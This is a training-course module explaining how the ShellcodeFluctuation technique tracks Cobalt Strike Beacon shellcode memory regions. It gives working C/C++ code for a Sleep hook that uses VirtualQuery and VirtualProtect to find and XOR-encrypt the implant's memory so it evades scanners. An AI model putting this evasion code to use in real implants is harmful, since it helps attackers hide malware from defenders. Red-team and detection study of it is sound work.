Module 6: Shellcode Region Tracking
Identifying shellcode allocation boundaries, using VirtualQuery for page-aligned operations, and supporting complex memory layouts.
Module Objective
Learn how ShellcodeFluctuation identifies the shellcode memory region boundaries when the MySleep hook fires, how VirtualQuery provides page-aligned region information, how to handle shellcode that spans multiple memory regions, and the challenges of tracking dynamically allocated sub-regions.
1. The Region Discovery Problem
When the Beacon shellcode calls Sleep and control transfers to MySleep, the hook handler needs to know exactly which memory region to encrypt. This is not always straightforward because:
Region Discovery Challenges
- The loader knows the allocation — the initial
VirtualAllocreturns the base address and size. This is the simplest case - Beacon may allocate additional memory — Cobalt Strike Beacon allocates heap memory for its own use, which also contains detectable artifacts
- Reflective loading changes the layout — if the shellcode is a reflective DLL, it maps sections at different addresses
- The hook runs in the shellcode's thread — we can use the thread's call stack or the return address to identify which region we are in
2. VirtualQuery: The Region Inspector
VirtualQuery is the primary API for discovering memory region properties. Given any address within a region, it returns the region's base address, size, protection, and type:
// VirtualQuery signature
SIZE_T VirtualQuery(
LPCVOID lpAddress, // Any address in the region
PMEMORY_BASIC_INFORMATION lpBuffer, // Output structure
SIZE_T dwLength // Size of output structure
);
// The MEMORY_BASIC_INFORMATION structure
typedef struct _MEMORY_BASIC_INFORMATION {
PVOID BaseAddress; // Base of the page containing lpAddress
PVOID AllocationBase; // Base of the entire allocation
DWORD AllocationProtect; // Initial protection at VirtualAlloc time
SIZE_T RegionSize; // Size of contiguous pages with same attributes
DWORD State; // MEM_COMMIT, MEM_RESERVE, MEM_FREE
DWORD Protect; // Current protection
DWORD Type; // MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE
} MEMORY_BASIC_INFORMATION;
Two fields are especially important for shellcode tracking:
| Field | Meaning | Use in Fluctuation |
|---|---|---|
AllocationBase | The base address returned by the original VirtualAlloc call | Identifies the start of the entire shellcode allocation |
RegionSize | Size of contiguous pages with identical protection/state/type | Defines how much memory to encrypt (may be less than total allocation if protection varies) |
3. Discovering Shellcode Boundaries at Hook Time
ShellcodeFluctuation can discover the shellcode region boundaries dynamically when the hook fires, using the return address on the stack:
// Dynamic region discovery using _ReturnAddress()
void WINAPI MySleep(DWORD dwMilliseconds) {
// The return address points into the shellcode that called Sleep
PVOID callerAddr = _ReturnAddress();
// Query the memory region containing the caller
MEMORY_BASIC_INFORMATION mbi;
VirtualQuery(callerAddr, &mbi, sizeof(mbi));
// mbi.AllocationBase = start of the shellcode allocation
// Now walk all committed regions in this allocation
LPVOID regionBase = mbi.AllocationBase;
SIZE_T totalSize = 0;
MEMORY_BASIC_INFORMATION walkMbi;
LPVOID walkAddr = regionBase;
while (VirtualQuery(walkAddr, &walkMbi, sizeof(walkMbi))) {
// Stop if we've left the allocation
if (walkMbi.AllocationBase != regionBase)
break;
// Only count committed regions
if (walkMbi.State == MEM_COMMIT) {
totalSize = (SIZE_T)((BYTE*)walkMbi.BaseAddress +
walkMbi.RegionSize - (BYTE*)regionBase);
}
walkAddr = (BYTE*)walkMbi.BaseAddress + walkMbi.RegionSize;
}
// Now we know: regionBase and totalSize
// Proceed with fluctuation...
}
Why Use _ReturnAddress()?
_ReturnAddress() is an MSVC compiler intrinsic that returns the address of the instruction that will execute after the current function returns. When MySleep is called (via the hooked Sleep), the return address points into the Beacon shellcode. This gives us an address inside the shellcode allocation without needing to track it globally from the loader.
4. Page Alignment and VirtualProtect
VirtualProtect operates on page boundaries. Understanding page alignment is critical for correct fluctuation:
// x86-64 page size
#define PAGE_SIZE 0x1000 // 4096 bytes
// VirtualProtect rounds addresses DOWN to page boundary
// and sizes UP to include all affected pages.
// Example:
// shellcodeBase = 0x1A0000 (page-aligned, from VirtualAlloc)
// shellcodeSize = 0x4C800 (not page-aligned)
// VirtualProtect(0x1A0000, 0x4C800, PAGE_READWRITE, &old)
// Actually affects pages: 0x1A0000 through 0x1EC000
// That's ceil(0x4C800 / 0x1000) = 77 pages
// VirtualAlloc always returns page-aligned addresses:
LPVOID base = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
// base is guaranteed to be 0x????0000 (64K aligned on Windows)
Page Alignment Guarantees
| API | Base Address Alignment | Size Alignment |
|---|---|---|
VirtualAlloc | 64 KB (allocation granularity) | Rounded up to page size (4 KB) |
VirtualProtect | Rounds down to page boundary | Rounds up to include full pages |
VirtualQuery | Reports page-aligned regions | Reports page-aligned sizes |
Since VirtualAlloc returns 64K-aligned addresses and VirtualProtect rounds to page boundaries, the fluctuation operates cleanly on aligned memory regions. There is no risk of accidentally affecting memory outside the shellcode allocation.
5. Multi-Region Shellcode
Complex implants may not have a single contiguous memory region. A reflective DLL loader, for example, maps different PE sections with different protections:
// Reflective DLL memory layout example:
// AllocationBase = 0x1A0000
//
// Region 1: 0x1A0000 - 0x1A0FFF PE headers (PAGE_READONLY)
// Region 2: 0x1A1000 - 0x1A5FFF .text (PAGE_EXECUTE_READ)
// Region 3: 0x1A6000 - 0x1A7FFF .rdata (PAGE_READONLY)
// Region 4: 0x1A8000 - 0x1A9FFF .data (PAGE_READWRITE)
// Region 5: 0x1AA000 - 0x1AAFFF .reloc (PAGE_READONLY)
// Each region has different protection. We need to:
// 1. Save each region's current protection
// 2. Flip ALL to RW
// 3. Encrypt ALL
// 4. After sleep: Decrypt ALL
// 5. Restore EACH region's original protection
To handle this, the fluctuation code must walk the entire allocation and process each region individually:
struct RegionInfo {
LPVOID base;
SIZE_T size;
DWORD originalProtect;
};
// Walk the allocation and collect all committed regions
std::vector<RegionInfo> CollectRegions(LPVOID allocationBase) {
std::vector<RegionInfo> regions;
MEMORY_BASIC_INFORMATION mbi;
LPVOID addr = allocationBase;
while (VirtualQuery(addr, &mbi, sizeof(mbi))) {
if (mbi.AllocationBase != allocationBase)
break;
if (mbi.State == MEM_COMMIT) {
regions.push_back({
mbi.BaseAddress,
mbi.RegionSize,
mbi.Protect
});
}
addr = (BYTE*)mbi.BaseAddress + mbi.RegionSize;
}
return regions;
}
// Encrypt all regions
void EncryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
for (auto& r : regions) {
DWORD oldProt;
VirtualProtect(r.base, r.size, PAGE_READWRITE, &oldProt);
r.originalProtect = oldProt; // Save actual protection
xor32((BYTE*)r.base, r.size, key);
}
}
// Decrypt and restore all regions
void DecryptAllRegions(std::vector<RegionInfo>& regions, DWORD key) {
for (auto& r : regions) {
xor32((BYTE*)r.base, r.size, key);
DWORD dummy;
VirtualProtect(r.base, r.size, r.originalProtect, &dummy);
}
}
6. Handling the Beacon Heap
Cobalt Strike Beacon allocates heap memory for its configuration, task buffers, and downloaded data. This heap data can contain IOCs (C2 URLs, decrypted task output, etc.) that scanners can find. ShellcodeFluctuation's approach to the heap varies:
| Approach | What Gets Encrypted | Heap Coverage | Complexity |
|---|---|---|---|
| Single allocation only | The original VirtualAlloc region containing the shellcode | None — heap is unprotected | Simple |
| All private executable | All MEM_PRIVATE regions with execute permissions | Partial — misses RW heap data | Moderate |
| Full allocation walk | All committed regions under the same AllocationBase | Good — covers co-allocated regions | Moderate |
| Heap tracking | Hook HeapAlloc/VirtualAlloc to track all implant allocations | Full — covers all implant memory | High |
Practical Limitation
ShellcodeFluctuation's primary focus is the shellcode execution region (the code itself). Beacon's heap allocations for configuration and data buffers are separate and may not be covered by the basic fluctuation mechanism. More advanced solutions like Cobalt Strike's built-in Sleep Mask Kit provide broader coverage of Beacon-owned memory.
7. Thread Safety Considerations
If the implant uses multiple threads, the fluctuation mechanism must handle concurrency:
// Potential race condition:
//
// Thread 1 (Beacon): Calls Sleep -> MySleep encrypts shellcode
// Thread 2 (Worker): Still executing shellcode code
//
// If Thread 2 is running when Thread 1 encrypts, Thread 2
// will execute encrypted garbage and crash!
// ShellcodeFluctuation assumes single-threaded shellcode:
// Cobalt Strike Beacon calls Sleep from its main loop,
// and worker tasks complete before the sleep cycle.
// For multi-threaded implants, a more robust approach:
CRITICAL_SECTION g_fluctLock;
volatile LONG g_activeThreads = 0;
void WINAPI MySleep_ThreadSafe(DWORD dwMilliseconds) {
EnterCriticalSection(&g_fluctLock);
// Wait for all other threads to reach a safe point
while (InterlockedCompareExchange(&g_activeThreads, 0, 0) > 1) {
LeaveCriticalSection(&g_fluctLock);
SwitchToThread();
EnterCriticalSection(&g_fluctLock);
}
// Safe to encrypt - only this thread is active in shellcode
// ... perform fluctuation cycle ...
LeaveCriticalSection(&g_fluctLock);
}
Single-Thread Assumption
In practice, ShellcodeFluctuation operates under the assumption that the Beacon is single-threaded at the point it calls Sleep. Cobalt Strike Beacon dispatches jobs synchronously in its main loop and only calls Sleep when all pending tasks are complete. This makes the single-thread assumption safe for the primary use case.
8. Region Tracking Summary
The complete region tracking approach used by ShellcodeFluctuation combines static initialization with dynamic verification:
// Complete region tracking flow in MySleep:
void WINAPI MySleep(DWORD dwMilliseconds) {
// Option A: Use pre-configured global state
// (Set during initialization by the loader)
LPVOID base = g_state.shellcodeBase;
SIZE_T size = g_state.shellcodeSize;
// Option B: Dynamic discovery (more robust)
// Uses _ReturnAddress() to find caller's allocation
MEMORY_BASIC_INFORMATION mbi;
VirtualQuery(_ReturnAddress(), &mbi, sizeof(mbi));
base = mbi.AllocationBase;
// Walk to find total committed size...
// Validate: is this the expected region?
if (base != g_state.shellcodeBase) {
// Unexpected caller - could be a different thread
// or the shellcode relocated. Use global state as fallback.
base = g_state.shellcodeBase;
size = g_state.shellcodeSize;
}
// Proceed with fluctuation using (base, size)
FluctuateCycle(base, size, dwMilliseconds);
}
Key Takeaways
- VirtualQuery provides page-aligned region information for any address
- AllocationBase identifies the original allocation, enabling full-allocation walks
- Page alignment is guaranteed by the Windows Memory Manager for
VirtualAllocregions - Multi-region support requires saving per-region original protections and restoring them individually
- Thread safety is assumed via single-thread behavior of the Beacon sleep loop
Knowledge Check
Q1: What does VirtualQuery's AllocationBase field represent?
Q2: Why might a reflective DLL's memory layout require per-region protection tracking?
Q3: How does ShellcodeFluctuation identify the shellcode region when the Sleep hook fires?